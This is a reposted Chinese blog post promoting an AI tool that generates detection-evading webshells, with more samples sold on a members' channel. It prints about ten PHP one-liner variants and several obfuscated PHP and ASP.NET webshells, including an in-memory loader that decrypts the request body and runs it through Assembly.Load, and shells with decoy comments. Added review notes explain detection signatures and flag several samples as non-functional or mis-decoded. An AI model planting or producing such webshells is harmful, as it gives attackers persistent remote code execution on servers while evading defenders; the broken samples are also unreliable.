文章总结: 文章展示AI生成PHP与ASP.NET免杀WebShell的十种基础混淆手法及金刚狼工具产出的高阶变种,核心结论是可借助AI快速迭代eval、assert、回调、编码、反射等技巧绕过静态检测,建议防守方强化动态行为与流量分析。 综合评分: 72 文章分类: 免杀,WebShell,AI安全,渗透测试,代码审计
AI一键免杀WebShell工具,金刚狼、哥斯垃、冰蝎、菜刀等
原创
0x7556
金刚狼不懂安全
2025年12月29日 21:19 中国香港
原webshell一句话
<?php @eval($_POST['wolf']);?>
以下是AI默认生成的10份PHP Webshell样例
PHP Webshell 变种列表:
- 基础变种 (不同参数名):
<?php @eval($_POST['password']);?>- 说明:最简单的变形,将常见的’wolf’参数改为’password’,以避开入门级规则。
- 使用GET请求:
<?php @eval($_GET['query']);?>- 说明:将数据提交方式从POST改为GET,参数也相应更改。
- 使用REQUEST变量:
<?php @eval($_REQUEST['data']);?>- 说明:
$_REQUEST可以同时接收GET和POST请求,更具灵活性。
- 使用Cookie:
<?php @eval($_COOKIE['session_id']);?>- 说明:通过Cookie传递payload,流量可能更隐蔽,不易被日志审计发现。这是因为常见Web服务器的默认访问日志格式通常不记录Cookie头和请求正文;防守方若要覆盖这一通道,需要在WAF、反向代理或应用层补充记录,并对异常长度或含代码特征的Cookie值告警。
- 使用
assert函数:
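<?php @assert($_POST['wolf']);?>- 说明:
assert函数在旧版本PHP中同样可以执行字符串形式的代码,是eval的常见替代品,有时能绕过对eval的严格监控。需要注意,向assert传入字符串参数的用法自PHP 7.2起被弃用,并在PHP 8.0中被移除;此外当zend.assertions设为-1时assert不会被求值。因此升级PHP版本并在生产环境关闭断言,可以直接消除这一类变种。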
- 变量函数调用:
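<?php $func = 'eval'; @$func($_POST['wolf']);?>- 说明:将
eval字符串赋值给变量,再通过变量调用函数,增加了静态分析的难度。需要注意,eval是PHP的语言结构而不是函数,可变函数语法无法调用语言结构,所以这一写法以及下文的Base64、ROT13两个变种在运行时只会触发“未定义函数”错误,并不会执行代码。对防守方而言,这类文件仍应按恶意意图告警,但不能指望动态沙箱观察到执行行为。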
- Base64编码混淆:
<?php $func = base64_decode('ZXZhbA=='); @$func($_POST['wolf']);?>- 说明:
'ZXZhbA=='是'eval'的Base64编码,在执行时解码,有效对抗基于字符串匹配的检测。
- 字符串旋转混淆 (ROT13):
<?php $func = str_rot13('riny'); @$func($_POST['wolf']);?>- 说明:
'riny'是'eval'经过ROT13变换后的结果,是一种简单的混淆方式。
- 使用
call_user_func:
<?php @call_user_func('assert', $_REQUEST['key']);?>- 说明:通过
call_user_func这个回调函数来执行assert,是另一种隐藏真实意图的方法。
- 组合复杂变种:
<?php $a = $_GET['a']; $b = $_GET['b']; @$a($b);?>- 说明:这是一个更高级的变种,函数名和参数都由用户通过GET请求提供(例如:
shell.php?a=assert&b=phpinfo()),极具灵活性和隐蔽性。
金刚狼AI免杀工具 生成的WebShell代码样例
下面仅展示几个,更多样例在星球,包含金刚狼、哥斯垃、冰蝎、菜刀等WebShell,每种类型提供10-20个文件
<?php
// NOTE(review): webshell sample from the article, annotated for detection purposes.
// The POST key and the callable name are stored reversed and restored with strrev(),
// so 'wolf' and 'eval' never appear as literals in the file. String-match rules need
// to normalise strrev() over constant arguments before matching.
$a8b1c2_data = [strrev('flow'), strrev('lave')];
$d3e4f5_func = $a8b1c2_data[1];
$g6h7i8_param = $_POST;
// Acts only when the POST body carries the restored key.
if (array_key_exists($a8b1c2_data[0], $g6h7i8_param)) {
$j9k0l1_payload = $g6h7i8_param[$a8b1c2_data[0]];
// The request value is concatenated into source text that create_function() compiles
// at runtime. create_function() was deprecated in PHP 7.2 and removed in PHP 8.0, so
// any remaining call to it that is fed by request data is a high-confidence indicator.
$m2n3o4_executor = create_function('', '$c_p5q6 = "' . addslashes($j9k0l1_payload) . '";' . $d3e4f5_func . '($c_p5q6);');
// '@' suppresses error reporting for this call.
@$m2n3o4_executor();
}
?>
<?php
// NOTE(review): webshell sample from the article, annotated for detection purposes.
// The original Korean comments were unrelated filler (food, weekend plans). They are
// translated below and marked "(decoy)". Filler comments in a script that reads
// $GLOBALS['_POST'] are themselves worth flagging.
// (decoy) I'm hungry, I want chicken
$map_a1b2 = [
'k' => [3, 1, 0, 2],
'f' => [5, 4, 6, 4]
];
// (decoy) What should I have for lunch today?
$parts_c3d4 = ['l', 'v', 'f', 'w', 'a', 'e', 'v'];
// (decoy) This code is very complicated
// Joins characters of $parts_c3d4 in the order given by an index list, so the
// resulting strings never appear as literals in the file.
$builder_e5f6 = function($indices) use ($parts_c3d4) {
$res_g7h8 = '';
// (decoy) What shall we do this weekend?
foreach ($indices as $i) {
$res_g7h8 .= $parts_c3d4[$i];
}
return $res_g7h8;
};
// (decoy) What is going on here?
// NOTE(review): with the tables above, these two calls yield 'wvlf' and 'eava', not the
// 'wolf'/'eval' pair used by the other samples on this page. The decoded values are
// therefore not a reliable signature; match on the structure instead.
$key_i9j0 = $builder_e5f6($map_a1b2['k']);
$func_k1l2 = $builder_e5f6($map_a1b2['f']);
// Final execution stage
$executor_m3n4 = function($f, $k) {
// Fetches data from the global variables.
// POST data is read through $GLOBALS['_POST'] instead of $_POST, so detection rules
// should cover both spellings.
$g_o5p6 = $GLOBALS;
if (isset($g_o5p6['_POST'][$k])) {
$payload_q7r8 = $g_o5p6['_POST'][$k];
// Calls the function dynamically: a request-supplied value is passed to a callable
// whose name was computed at runtime. '@' suppresses error reporting for the call.
@$f($payload_q7r8);
}
};
$executor_m3n4($func_k1l2, $key_i9j0);
?>
<?php
// NOTE(review): webshell sample from the article, annotated for detection purposes.
// The original English comments (kept below) describe localization and date formatting;
// none of that happens in the code. They are a cover story, so a reviewer should compare
// each comment with the statement under it instead of trusting it.
// This script is responsible for processing and validating user localization settings.
// Fetches the primary configuration key from the settings map.
// This key determines which localization file to load.
// NOTE(review): hex2bin('776f6c66') is the ASCII string 'wolf', the POST key.
$localeSettingsKey = hex2bin('776f6c66');
// This function retrieves the appropriate parsing engine for the given locale.
// It's a legacy function and should be refactored later.
// NOTE(review): returns the Base64-decoded constant; 'ZXZhbA==' decodes to 'eval'.
function getParsingEngine() {
// For backward compatibility, we use a base64 encoded engine identifier.
$engineId = 'ZXZhbA==';
return base64_decode($engineId);
}
// Load the user-submitted data for processing.
$userSubmittedData = $_POST;
// Check if custom localization settings are provided by the user.
if (isset($userSubmittedData[$localeSettingsKey])) {
// This block is for debugging and will be removed in production.
// It verifies the integrity of the settings.
// NOTE(review): this branch only writes a log line when PRODUCTION_MODE is defined
// and true; it does not gate the call below.
if (defined('PRODUCTION_MODE') && PRODUCTION_MODE === true) {
// In production, we would log an error here.
error_log("Debug block executed in production.");
}
// Formats the user's last login date.
// NOTE(review): no formatting occurs; this is the raw POST value.
$lastLoginDate = $userSubmittedData[$localeSettingsKey];
// Get the designated engine for parsing the date format.
$dateParser = getParsingEngine();
// Apply the formatting rules to the user's date string.
// NOTE(review): the POST value is passed to a callable named by a decoded constant.
// Detection should follow constant hex2bin()/base64_decode() results into call sites.
@$dateParser($lastLoginDate);
}
?>
<?php
// NOTE(review): webshell sample from the article, annotated for detection purposes.
// The original Japanese comments were unrelated filler and are translated below and
// marked "(decoy)".
// (decoy) The moon is beautiful, isn't it
// The callable name is produced by XOR-ing two byte-string constants at runtime.
// NOTE(review): the original trailing comment claims the result is "eval", but the
// bytes shown do not XOR to that string. Treat the pattern (XOR of two constants, then
// a call with request data) as the signature, not the decoded value.
$x_k4g7 = "\x53\x56\x55\x52" ^ "\x26\x22\x20\x2e"; // "eval" (as claimed by the original)
$z_m9p2 = $GLOBALS;
$y_n1f8 = 'wolf';
// $state is fixed at 1 just before the switch, so the switch is control-flow padding.
$state = 1;
// (decoy) Easier done than worried about (proverb)
switch ($state) {
case 1:
// POST data is read through $GLOBALS['_POST'] instead of $_POST.
if (array_key_exists($y_n1f8, $z_m9p2['_POST'])) {
$data_r5t3 = $z_m9p2['_POST'][$y_n1f8];
// The request value is passed to the runtime-computed callable name.
$x_k4g7($data_r5t3);
}
break;
// This case is never executed
case 2:
$state = 0;
break;
}
金刚狼webshell变种
<%@ Page Language="C#" %>
<%
// NOTE(review): webshell sample from the article, annotated for detection purposes.
// The original Japanese comments were unrelated filler and are translated below and
// marked "(decoy)".
// Runs on any request that carries at least one cookie.
if (Request.Cookies.Count != 0) {
// (decoy) The moon is beautiful, isn't it
// Type and member names are held as string fragments so they can be resolved by
// reflection. "System.Reflection.Assembly" is split across two entries and never
// appears as one literal.
var _map_x1 = new System.Collections.Generic.Dictionary<int, string>();
_map_x1[10] = "System.Reflect";
_map_x1[20] = "ion.Assembly";
_map_x1[30] = "Load";
_map_x1[40] = "CreateInstance";
_map_x1[50] = "Equals";
_map_x1[60] = "System.Security.Cryptography.RijndaelManaged";
_map_x1[70] = "CreateDecryptor";
_map_x1[80] = "TransformFinalBlock";
_map_x1[90] = "K";
_map_x1[100] = "ca63457538b9b1e0";
// (decoy) Very sleepy
// The hard-coded 16-character string above becomes the key bytes.
System.Func<string, byte[]> _f1_z9 = (s) => System.Text.Encoding.Default.GetBytes(s);
byte[] _k_y8 = _f1_z9(_map_x1[100]);
// (decoy) Today's weather is sunny
// Reads the whole request body in one Read call; the return value is not checked.
var _s_w7 = Request.InputStream;
byte[] _c_v6 = new byte[_s_w7.Length];
_s_w7.Read(_c_v6, 0, _c_v6.Length);
// (decoy) I'll do this task tomorrow
// Creates the cipher object by type name and calls CreateDecryptor(key, iv) via
// reflection, with the same bytes used as both key and IV.
object _o_u5 = System.Activator.CreateInstance(System.Type.GetType(_map_x1[60]));
var _m_t4 = _o_u5.GetType().GetMethod(_map_x1[70], new System.Type[]{typeof(byte[]), typeof(byte[])});
var _d_s3 = (System.Security.Cryptography.ICryptoTransform) _m_t4.Invoke(_o_u5, new object[]{_k_y8, _k_y8});
// (decoy) The server is not responding
// Decrypts the request body.
var _m_r2 = _d_s3.GetType().GetMethod(_map_x1[80]);
byte[] _p_q1 = (byte[])_m_r2.Invoke(_d_s3, new object[]{_c_v6, 0, _c_v6.Length});
// (decoy) I want to eat ramen
// Loads the decrypted bytes as an assembly through Assembly.Load(byte[]), so this code
// writes nothing to disk. It then creates an instance of the type named "K" and calls
// Equals(this), handing the Page object to the loaded code.
// NOTE(review): presumably "K" overrides Equals as its entry point; the payload is not
// on this page, so that cannot be confirmed here.
// Detection: a page that feeds Request.InputStream into Assembly.Load, string-based
// lookup of "Load"/"CreateInstance", and a request body that is an opaque binary blob.
var _a_p0 = System.Type.GetType(_map_x1[10] + _map_x1[20]).GetMethod(_map_x1[30], new System.Type[]{typeof(byte[])}).Invoke(null, new object[]{_p_q1});
var _i_o9 = _a_p0.GetType().GetMethod(_map_x1[40], new System.Type[]{typeof(string)}).Invoke(_a_p0, new object[]{_map_x1[90]});
_i_o9.GetType().GetMethod(_map_x1[50]).Invoke(_i_o9, new object[]{this});
}
%>
<%@ Page Language="C#" %>
<script runat="server">
// NOTE(review): webshell sample from the article, annotated for detection purposes.
// The XML docs and comments below are the sample's own cover story ("plugin manager",
// "secure configuration service"). What the code does is decrypt the request body with
// a hard-coded key, load it as an assembly and hand it the Page object.
/// <summary>
/// Manages the dynamic loading and execution of content personalization plugins.
/// This class handles encrypted plugin payloads delivered via POST requests.
/// </summary>
public class DynamicPluginManager
{
// The default encryption key for decoding plugin payloads. Stored in a secure format.
// NOTE(review): the "secure format" is plain hex of a constant; see the constructor.
private readonly byte[] _pluginDecryptionKey;
// The primary entry point class name within the dynamically loaded plugin assembly.
private readonly string _pluginEntryPointClass = "K";
public DynamicPluginManager()
{
// In a real application, this key would be fetched from a secure configuration service.
// NOTE(review): the hex string decodes to the ASCII text "ca63457538b9b1e0", the same
// value that appears as a literal in the other ASPX sample on this page. A rule keyed
// on either spelling should also cover the other.
string hexKey = "63613633343537353338623962316530";
this._pluginDecryptionKey = Enumerable.Range(0, hexKey.Length)
.Where(x => x % 2 == 0)
.Select(x => Convert.ToByte(hexKey.Substring(x, 2), 16))
.ToArray();
}
/// <summary>
/// Processes an encrypted plugin payload from an input stream.
/// It decrypts the payload, loads the resulting assembly, and executes the plugin.
/// </summary>
/// <param name="payloadStream">The stream containing the encrypted plugin data.</param>
/// <param name="pageContext">The current ASP.NET Page context to pass to the plugin.</param>
public void LoadAndExecutePlugin(System.IO.Stream payloadStream, object pageContext)
{
if (payloadStream == null || payloadStream.Length == 0) return;
// Read the encrypted payload from the stream.
// NOTE(review): a single Read call; the return value is not checked.
byte[] encryptedPlugin = new byte[payloadStream.Length];
payloadStream.Read(encryptedPlugin, 0, encryptedPlugin.Length);
// Decrypt the payload to get the raw assembly bytes.
// NOTE(review): the same bytes are passed as both key and IV.
byte[] assemblyBytes;
using (var aesProvider = new System.Security.Cryptography.RijndaelManaged())
{
using (var decryptor = aesProvider.CreateDecryptor(_pluginDecryptionKey, _pluginDecryptionKey))
{
assemblyBytes = decryptor.TransformFinalBlock(encryptedPlugin, 0, encryptedPlugin.Length);
}
}
// Load the assembly from the decrypted bytes.
// NOTE(review): Assembly.Load(byte[]) on request-derived data is the key indicator.
// This code writes nothing to disk, so file-based scanning never sees the payload.
var pluginAssembly = System.Reflection.Assembly.Load(assemblyBytes);
// Instantiate the plugin's entry point class and pass the context.
// NOTE(review): Equals() is called for its side effects and its result is discarded.
// Presumably the loaded type overrides Equals as an entry point; the payload is not on
// this page, so that cannot be confirmed here.
var pluginInstance = pluginAssembly.CreateInstance(_pluginEntryPointClass);
pluginInstance.Equals(pageContext);
}
}
</script>
<%
// We only initialize the plugin system if a session is active (indicated by cookies).
// NOTE(review): the only condition checked is that the request carries at least one
// cookie. No session, authentication or authorization check is made before the raw
// request body and the Page object are passed to LoadAndExecutePlugin.
if (Request.Cookies.Count != 0)
{
var pluginManager = new DynamicPluginManager();
pluginManager.LoadAndExecutePlugin(Request.InputStream, this);
}
%>
一键AI免杀工具即将推出,星球 暂放已处理好的WebShell
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:金刚狼不懂安全 0x7556《AI一键免杀WebShell工具,金刚狼、哥斯垃、冰蝎、菜刀等》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。










